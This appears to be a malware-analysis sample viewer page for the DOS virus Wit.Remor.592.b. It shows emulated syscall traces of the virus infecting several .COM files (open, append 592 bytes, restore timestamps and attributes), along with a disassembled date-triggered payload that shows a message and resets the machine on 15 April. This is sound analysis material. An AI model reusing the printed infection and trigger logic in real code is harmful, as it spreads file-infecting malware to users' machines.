Sample viewer

vx.netlux.org/Virus.DOS.Wit.Remor.592.b

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:42:37.573617053Z 26 PC: 12a70 | Set disk transfer address
2018-12-17T22:42:37.5755982Z 71 PC: 12a82 | Get current directory
2018-12-17T22:42:37.579354866Z 42 PC: 12a88 | Get date
0x12a88: cmp dh, 4
0x12a8b: jne 0x12aa6
0x12a8d: cmp dl, 0xf
0x12a90: jne 0x12aa6
0x12a92: mov ax, 0x1010
0x12a95: out 0x70, ax
0x12a97: mov dx, 0x2eb
0x12a9a: mov ah, 9
0x12a9c: int 0x21
0x12a9e: mov ah, 8
0x12aa0: int 0x21
0x12aa2: mov al, 0xfe
0x12aa4: out 0x64, al
0x12aa6: mov ah, byte ptr [0x315]
0x12aaa: mov cl, 7
0x12aac: mov dx, 0x2df
0x12aaf: int 0x21
0x12ab1: jae 0x12ab6
0x12ab3: jmp 0x12bdd
0x12ab6: mov dx, word ptr [0x30e]
2018-12-17T22:42:37.581800811Z 78 PC: 12ab1 | Find first file
2018-12-17T22:42:37.58868528Z 67 PC: 12acd | Get or set file attributes
2018-12-17T22:42:37.610531931Z 61 PC: 12ae1 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:42:37.618490371Z 63 PC: 12afd | Read file or device (Read 592 bytes on handle 5)
2018-12-17T22:42:37.626087278Z 66 PC: 12b1c | Move file pointer
2018-12-17T22:42:37.629442429Z 66 PC: 12b3f | Move file pointer
2018-12-17T22:42:37.631778874Z 64 PC: 12b5a | Write file or device (Write 407 bytes on handle 5)
2018-12-17T22:42:37.643474213Z 66 PC: 12b89 | Move file pointer
2018-12-17T22:42:37.645889308Z 64 PC: 12b9a | Write file or device (Write 592 bytes on handle 5)
2018-12-17T22:42:37.656045879Z 87 PC: 12bab | Get or set file date and time
2018-12-17T22:42:37.657866626Z 62 PC: 12bb1 | Close file
2018-12-17T22:42:37.667096299Z 67 PC: 12bc3 | Get or set file attributes
2018-12-17T22:42:37.678489801Z 79 PC: 12ab1 | Find next file
2018-12-17T22:42:37.681901575Z 67 PC: 12acd | Get or set file attributes
2018-12-17T22:42:37.692650106Z 61 PC: 12ae1 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:42:37.700354171Z 63 PC: 12afd | Read file or device (Read 592 bytes on handle 5)
2018-12-17T22:42:37.70738246Z 66 PC: 12b1c | Move file pointer
2018-12-17T22:42:37.708924373Z 66 PC: 12b3f | Move file pointer
2018-12-17T22:42:37.71127915Z 64 PC: 12b5a | Write file or device (Write 27 bytes on handle 5)
2018-12-17T22:42:37.71592533Z 66 PC: 12b89 | Move file pointer
2018-12-17T22:42:37.717298778Z 64 PC: 12b9a | Write file or device (Write 592 bytes on handle 5)
2018-12-17T22:42:37.727051785Z 87 PC: 12bab | Get or set file date and time
2018-12-17T22:42:37.728653507Z 62 PC: 12bb1 | Close file
2018-12-17T22:42:37.738061899Z 67 PC: 12bc3 | Get or set file attributes
2018-12-17T22:42:37.749239169Z 79 PC: 12ab1 | Find next file
2018-12-17T22:42:37.752209644Z 67 PC: 12acd | Get or set file attributes
2018-12-17T22:42:37.762840468Z 61 PC: 12ae1 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:42:37.771009108Z 63 PC: 12afd | Read file or device (Read 592 bytes on handle 5)
2018-12-17T22:42:37.77860273Z 66 PC: 12b1c | Move file pointer
2018-12-17T22:42:37.780178476Z 66 PC: 12b3f | Move file pointer
2018-12-17T22:42:37.781973694Z 64 PC: 12b5a | Write file or device (Write 92 bytes on handle 5)
2018-12-17T22:42:37.787584996Z 66 PC: 12b89 | Move file pointer
2018-12-17T22:42:37.789262978Z 64 PC: 12b9a | Write file or device (Write 592 bytes on handle 5)
2018-12-17T22:42:37.799075221Z 87 PC: 12bab | Get or set file date and time
2018-12-17T22:42:37.802872603Z 62 PC: 12bb1 | Close file
2018-12-17T22:42:37.812874797Z 67 PC: 12bc3 | Get or set file attributes
2018-12-17T22:42:37.82532685Z 79 PC: 12ab1 | Find next file
2018-12-17T22:42:37.82996666Z 67 PC: 12acd | Get or set file attributes
2018-12-17T22:42:37.841211285Z 61 PC: 12ae1 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:42:37.84914503Z 63 PC: 12afd | Read file or device (Read 592 bytes on handle 5)
2018-12-17T22:42:37.857446006Z 66 PC: 12b1c | Move file pointer
2018-12-17T22:42:37.859238919Z 66 PC: 12b3f | Move file pointer
2018-12-17T22:42:37.860958196Z 64 PC: 12b5a | Write file or device (Write 29 bytes on handle 5)
2018-12-17T22:42:37.866533468Z 66 PC: 12b89 | Move file pointer
2018-12-17T22:42:37.869289978Z 64 PC: 12b9a | Write file or device (Write 592 bytes on handle 5)
2018-12-17T22:42:37.878559239Z 87 PC: 12bab | Get or set file date and time
2018-12-17T22:42:37.880764928Z 62 PC: 12bb1 | Close file
2018-12-17T22:42:37.889959317Z 67 PC: 12bc3 | Get or set file attributes
2018-12-17T22:42:37.900841Z 79 PC: 12ab1 | Find next file
2018-12-17T22:42:37.90389066Z 67 PC: 12acd | Get or set file attributes
2018-12-17T22:42:37.915298774Z 61 PC: 12ae1 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:42:37.922909578Z 63 PC: 12afd | Read file or device (Read 592 bytes on handle 5)
2018-12-17T22:42:37.9302674Z 66 PC: 12b1c | Move file pointer
2018-12-17T22:42:37.933995963Z 66 PC: 12b3f | Move file pointer
2018-12-17T22:42:37.936043641Z 64 PC: 12b5a | Write file or device (Write 29 bytes on handle 5)
2018-12-17T22:42:37.941245873Z 66 PC: 12b89 | Move file pointer
2018-12-17T22:42:37.944029046Z 64 PC: 12b9a | Write file or device (Write 592 bytes on handle 5)
2018-12-17T22:42:37.953786809Z 87 PC: 12bab | Get or set file date and time
2018-12-17T22:42:37.955861187Z 62 PC: 12bb1 | Close file
2018-12-17T22:42:37.965397982Z 67 PC: 12bc3 | Get or set file attributes
2018-12-17T22:42:37.97656933Z 59 PC: 12be6 | Change current directory
2018-12-17T22:42:37.981387576Z 26 PC: 12c03 | Set disk transfer address
2018-12-17T22:42:37.983836469Z 59 PC: 12c0e | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7616,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:02:05.370224173Z 26 PC: 12a70 | Set disk transfer address
2018-12-25T12:02:05.371599218Z 71 PC: 12a82 | Get current directory
2018-12-25T12:02:05.374479821Z 42 PC: 12a88 | Get date
0x12a88: cmp dh, 4
0x12a8b: jne 0x12aa6
0x12a8d: cmp dl, 0xf
0x12a90: jne 0x12aa6
0x12a92: mov ax, 0x1010
0x12a95: out 0x70, ax
0x12a97: mov dx, 0x2eb
0x12a9a: mov ah, 9
0x12a9c: int 0x21
0x12a9e: mov ah, 8
0x12aa0: int 0x21
0x12aa2: mov al, 0xfe
0x12aa4: out 0x64, al
0x12aa6: mov ah, byte ptr [0x315]
0x12aaa: mov cl, 7
0x12aac: mov dx, 0x2df
0x12aaf: int 0x21
0x12ab1: jae 0x12ab6
0x12ab3: jmp 0x12bdd
0x12ab6: mov dx, word ptr [0x30e]
2018-12-25T12:02:05.376821937Z 78 PC: 12ab1 | Find first file
2018-12-25T12:02:05.383310818Z 67 PC: 12acd | Get or set file attributes
2018-12-25T12:02:05.397786718Z 61 PC: 12ae1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:02:05.404073895Z 63 PC: 12afd | Read file or device (Read 592 bytes on handle 5)
2018-12-25T12:02:05.410343588Z 66 PC: 12b1c | Move file pointer
2018-12-25T12:02:05.418882227Z 66 PC: 12b3f | Move file pointer
2018-12-25T12:02:05.420229211Z 64 PC: 12b5a | Write file or device (Write 407 bytes on handle 5)
2018-12-25T12:02:05.428896757Z 66 PC: 12b89 | Move file pointer
2018-12-25T12:02:05.43006853Z 64 PC: 12b9a | Write file or device (Write 592 bytes on handle 5)
2018-12-25T12:02:05.437839585Z 87 PC: 12bab | Get or set file date and time
2018-12-25T12:02:05.439593447Z 62 PC: 12bb1 | Close file
2018-12-25T12:02:05.448977013Z 67 PC: 12bc3 | Get or set file attributes
2018-12-25T12:02:05.458271866Z 79 PC: 12ab1 | Find next file (See above)
2018-12-25T12:02:05.461006983Z 67 PC: 12acd | Get or set file attributes (See above)
2018-12-25T12:02:05.470509714Z 61 PC: 12ae1 | Open file (See above)
2018-12-25T12:02:05.47442384Z 63 PC: 12afd | Read file or device (See above)
2018-12-25T12:02:05.478749677Z 66 PC: 12b1c | Move file pointer (See above)
2018-12-25T12:02:05.479889197Z 66 PC: 12b3f | Move file pointer (See above)
2018-12-25T12:02:05.480749595Z 64 PC: 12b5a | Write file or device (See above)
2018-12-25T12:02:05.483466499Z 66 PC: 12b89 | Move file pointer (See above)
2018-12-25T12:02:05.484562654Z 64 PC: 12b9a | Write file or device (See above)
2018-12-25T12:02:05.49021191Z 87 PC: 12bab | Get or set file date and time (See above)
2018-12-25T12:02:05.49134898Z 62 PC: 12bb1 | Close file (See above)
2018-12-25T12:02:05.496431504Z 67 PC: 12bc3 | Get or set file attributes (See above)
2018-12-25T12:02:05.502354053Z 79 PC: 12ab1 | Find next file (See above)
2018-12-25T12:02:05.503965739Z 67 PC: 12acd | Get or set file attributes (See above)
2018-12-25T12:02:05.509992391Z 61 PC: 12ae1 | Open file (See above)
2018-12-25T12:02:05.513809358Z 63 PC: 12afd | Read file or device (See above)
2018-12-25T12:02:05.517564872Z 66 PC: 12b1c | Move file pointer (See above)
2018-12-25T12:02:05.518934305Z 66 PC: 12b3f | Move file pointer (See above)
2018-12-25T12:02:05.519803105Z 64 PC: 12b5a | Write file or device (See above)
2018-12-25T12:02:05.522290208Z 66 PC: 12b89 | Move file pointer (See above)
2018-12-25T12:02:05.523911211Z 64 PC: 12b9a | Write file or device (See above)
2018-12-25T12:02:05.528902686Z 87 PC: 12bab | Get or set file date and time (See above)
2018-12-25T12:02:05.52980881Z 62 PC: 12bb1 | Close file (See above)
2018-12-25T12:02:05.534513892Z 67 PC: 12bc3 | Get or set file attributes (See above)
2018-12-25T12:02:05.541832278Z 79 PC: 12ab1 | Find next file (See above)
2018-12-25T12:02:05.543896268Z 67 PC: 12acd | Get or set file attributes (See above)
2018-12-25T12:02:05.549894766Z 61 PC: 12ae1 | Open file (See above)
2018-12-25T12:02:05.553947139Z 63 PC: 12afd | Read file or device (See above)
2018-12-25T12:02:05.557815892Z 66 PC: 12b1c | Move file pointer (See above)
2018-12-25T12:02:05.559205966Z 66 PC: 12b3f | Move file pointer (See above)
2018-12-25T12:02:05.560105359Z 64 PC: 12b5a | Write file or device (See above)
2018-12-25T12:02:05.562677473Z 66 PC: 12b89 | Move file pointer (See above)
2018-12-25T12:02:05.564270283Z 64 PC: 12b9a | Write file or device (See above)
2018-12-25T12:02:05.572139315Z 87 PC: 12bab | Get or set file date and time (See above)
2018-12-25T12:02:05.573497053Z 62 PC: 12bb1 | Close file (See above)
2018-12-25T12:02:05.581142432Z 67 PC: 12bc3 | Get or set file attributes (See above)
2018-12-25T12:02:05.590508386Z 79 PC: 12ab1 | Find next file (See above)
2018-12-25T12:02:05.592756127Z 67 PC: 12acd | Get or set file attributes (See above)
2018-12-25T12:02:05.602566122Z 61 PC: 12ae1 | Open file (See above)
2018-12-25T12:02:05.613867833Z 63 PC: 12afd | Read file or device (See above)
2018-12-25T12:02:05.619735454Z 66 PC: 12b1c | Move file pointer (See above)
2018-12-25T12:02:05.621345234Z 66 PC: 12b3f | Move file pointer (See above)
2018-12-25T12:02:05.622544328Z 64 PC: 12b5a | Write file or device (See above)
2018-12-25T12:02:05.626670601Z 66 PC: 12b89 | Move file pointer (See above)
2018-12-25T12:02:05.628188646Z 64 PC: 12b9a | Write file or device (See above)
2018-12-25T12:02:05.635871897Z 87 PC: 12bab | Get or set file date and time (See above)
2018-12-25T12:02:05.637029541Z 62 PC: 12bb1 | Close file (See above)
2018-12-25T12:02:05.644862637Z 67 PC: 12bc3 | Get or set file attributes (See above)
2018-12-25T12:02:05.654248156Z 59 PC: 12be6 | Change current directory
2018-12-25T12:02:05.658064916Z 26 PC: 12c03 | Set disk transfer address
2018-12-25T12:02:05.659311093Z 59 PC: 12c0e | Change current directory

{"DateBased":true,"Day":1,"Month":4,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7616,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:02:05.420677591Z 26 PC: 12a70 | Set disk transfer address
2018-12-25T12:02:05.42256905Z 71 PC: 12a82 | Get current directory
2018-12-25T12:02:05.425365881Z 42 PC: 12a88 | Get date
0x12a88: cmp dh, 4
0x12a8b: jne 0x12aa6
0x12a8d: cmp dl, 0xf
0x12a90: jne 0x12aa6
0x12a92: mov ax, 0x1010
0x12a95: out 0x70, ax
0x12a97: mov dx, 0x2eb
0x12a9a: mov ah, 9
0x12a9c: int 0x21
0x12a9e: mov ah, 8
0x12aa0: int 0x21
0x12aa2: mov al, 0xfe
0x12aa4: out 0x64, al
0x12aa6: mov ah, byte ptr [0x315]
0x12aaa: mov cl, 7
0x12aac: mov dx, 0x2df
0x12aaf: int 0x21
0x12ab1: jae 0x12ab6
0x12ab3: jmp 0x12bdd
0x12ab6: mov dx, word ptr [0x30e]
2018-12-25T12:02:05.427377501Z 78 PC: 12ab1 | Find first file
2018-12-25T12:02:05.433188198Z 67 PC: 12acd | Get or set file attributes
2018-12-25T12:02:05.449588287Z 61 PC: 12ae1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:02:05.455941429Z 63 PC: 12afd | Read file or device (Read 592 bytes on handle 5)
2018-12-25T12:02:05.462366649Z 66 PC: 12b1c | Move file pointer
2018-12-25T12:02:05.464573872Z 66 PC: 12b3f | Move file pointer
2018-12-25T12:02:05.46629071Z 64 PC: 12b5a | Write file or device (Write 407 bytes on handle 5)
2018-12-25T12:02:05.474935967Z 66 PC: 12b89 | Move file pointer
2018-12-25T12:02:05.476881899Z 64 PC: 12b9a | Write file or device (Write 592 bytes on handle 5)
2018-12-25T12:02:05.485475239Z 87 PC: 12bab | Get or set file date and time
2018-12-25T12:02:05.486859704Z 62 PC: 12bb1 | Close file
2018-12-25T12:02:05.497787084Z 67 PC: 12bc3 | Get or set file attributes
2018-12-25T12:02:05.507358672Z 79 PC: 12ab1 | Find next file (See above)
2018-12-25T12:02:05.510860928Z 67 PC: 12acd | Get or set file attributes (See above)
2018-12-25T12:02:05.521192769Z 61 PC: 12ae1 | Open file (See above)
2018-12-25T12:02:05.527652895Z 63 PC: 12afd | Read file or device (See above)
2018-12-25T12:02:05.534139159Z 66 PC: 12b1c | Move file pointer (See above)
2018-12-25T12:02:05.542692465Z 66 PC: 12b3f | Move file pointer (See above)
2018-12-25T12:02:05.543984492Z 64 PC: 12b5a | Write file or device (See above)
2018-12-25T12:02:05.546572664Z 66 PC: 12b89 | Move file pointer (See above)
2018-12-25T12:02:05.547478233Z 64 PC: 12b9a | Write file or device (See above)
2018-12-25T12:02:05.553275288Z 87 PC: 12bab | Get or set file date and time (See above)
2018-12-25T12:02:05.554691353Z 62 PC: 12bb1 | Close file (See above)
2018-12-25T12:02:05.56187168Z 67 PC: 12bc3 | Get or set file attributes (See above)
2018-12-25T12:02:05.571707188Z 79 PC: 12ab1 | Find next file (See above)
2018-12-25T12:02:05.573782948Z 67 PC: 12acd | Get or set file attributes (See above)
2018-12-25T12:02:05.583257278Z 61 PC: 12ae1 | Open file (See above)
2018-12-25T12:02:05.590143194Z 63 PC: 12afd | Read file or device (See above)
2018-12-25T12:02:05.596302206Z 66 PC: 12b1c | Move file pointer (See above)
2018-12-25T12:02:05.597549698Z 66 PC: 12b3f | Move file pointer (See above)
2018-12-25T12:02:05.599318832Z 64 PC: 12b5a | Write file or device (See above)
2018-12-25T12:02:05.603573838Z 66 PC: 12b89 | Move file pointer (See above)
2018-12-25T12:02:05.60497868Z 64 PC: 12b9a | Write file or device (See above)
2018-12-25T12:02:05.613586692Z 87 PC: 12bab | Get or set file date and time (See above)
2018-12-25T12:02:05.615189688Z 62 PC: 12bb1 | Close file (See above)
2018-12-25T12:02:05.622791305Z 67 PC: 12bc3 | Get or set file attributes (See above)
2018-12-25T12:02:05.63281331Z 79 PC: 12ab1 | Find next file (See above)
2018-12-25T12:02:05.635292461Z 67 PC: 12acd | Get or set file attributes (See above)
2018-12-25T12:02:05.644697137Z 61 PC: 12ae1 | Open file (See above)
2018-12-25T12:02:05.662508911Z 63 PC: 12afd | Read file or device (See above)
2018-12-25T12:02:05.668738684Z 66 PC: 12b1c | Move file pointer (See above)
2018-12-25T12:02:05.670013417Z 66 PC: 12b3f | Move file pointer (See above)
2018-12-25T12:02:05.671804797Z 64 PC: 12b5a | Write file or device (See above)
2018-12-25T12:02:05.676138317Z 66 PC: 12b89 | Move file pointer (See above)
2018-12-25T12:02:05.677528625Z 64 PC: 12b9a | Write file or device (See above)
2018-12-25T12:02:05.686174854Z 87 PC: 12bab | Get or set file date and time (See above)
2018-12-25T12:02:05.6884701Z 62 PC: 12bb1 | Close file (See above)
2018-12-25T12:02:05.696061865Z 67 PC: 12bc3 | Get or set file attributes (See above)
2018-12-25T12:02:05.705853645Z 79 PC: 12ab1 | Find next file (See above)
2018-12-25T12:02:05.708254642Z 67 PC: 12acd | Get or set file attributes (See above)
2018-12-25T12:02:05.717529672Z 61 PC: 12ae1 | Open file (See above)
2018-12-25T12:02:05.724331346Z 63 PC: 12afd | Read file or device (See above)
2018-12-25T12:02:05.730426465Z 66 PC: 12b1c | Move file pointer (See above)
2018-12-25T12:02:05.731801341Z 66 PC: 12b3f | Move file pointer (See above)
2018-12-25T12:02:05.734023683Z 64 PC: 12b5a | Write file or device (See above)
2018-12-25T12:02:05.73808433Z 66 PC: 12b89 | Move file pointer (See above)
2018-12-25T12:02:05.739416481Z 64 PC: 12b9a | Write file or device (See above)
2018-12-25T12:02:05.748212085Z 87 PC: 12bab | Get or set file date and time (See above)
2018-12-25T12:02:05.749534186Z 62 PC: 12bb1 | Close file (See above)
2018-12-25T12:02:05.7571475Z 67 PC: 12bc3 | Get or set file attributes (See above)
2018-12-25T12:02:05.767006431Z 59 PC: 12be6 | Change current directory
2018-12-25T12:02:05.770870694Z 26 PC: 12c03 | Set disk transfer address
2018-12-25T12:02:05.77175379Z 59 PC: 12c0e | Change current directory

{"DateBased":true,"Day":15,"Month":4,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7616,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:02:05.836347083Z 26 PC: 12a70 | Set disk transfer address
2018-12-25T12:02:05.837872539Z 71 PC: 12a82 | Get current directory
2018-12-25T12:02:05.841199936Z 42 PC: 12a88 | Get date
0x12a88: cmp dh, 4
0x12a8b: jne 0x12aa6
0x12a8d: cmp dl, 0xf
0x12a90: jne 0x12aa6
0x12a92: mov ax, 0x1010
0x12a95: out 0x70, ax
0x12a97: mov dx, 0x2eb
0x12a9a: mov ah, 9
0x12a9c: int 0x21
0x12a9e: mov ah, 8
0x12aa0: int 0x21
0x12aa2: mov al, 0xfe
0x12aa4: out 0x64, al
0x12aa6: mov ah, byte ptr [0x315]
0x12aaa: mov cl, 7
0x12aac: mov dx, 0x2df
0x12aaf: int 0x21
0x12ab1: jae 0x12ab6
0x12ab3: jmp 0x12bdd
0x12ab6: mov dx, word ptr [0x30e]
2018-12-25T12:02:05.84333126Z 9 PC: 12a9e | Display string (String= '��ࠡ���� - rulez forever ! ')
2018-12-25T12:02:05.847671626Z 8 PC: 12aa2 | Console input without echo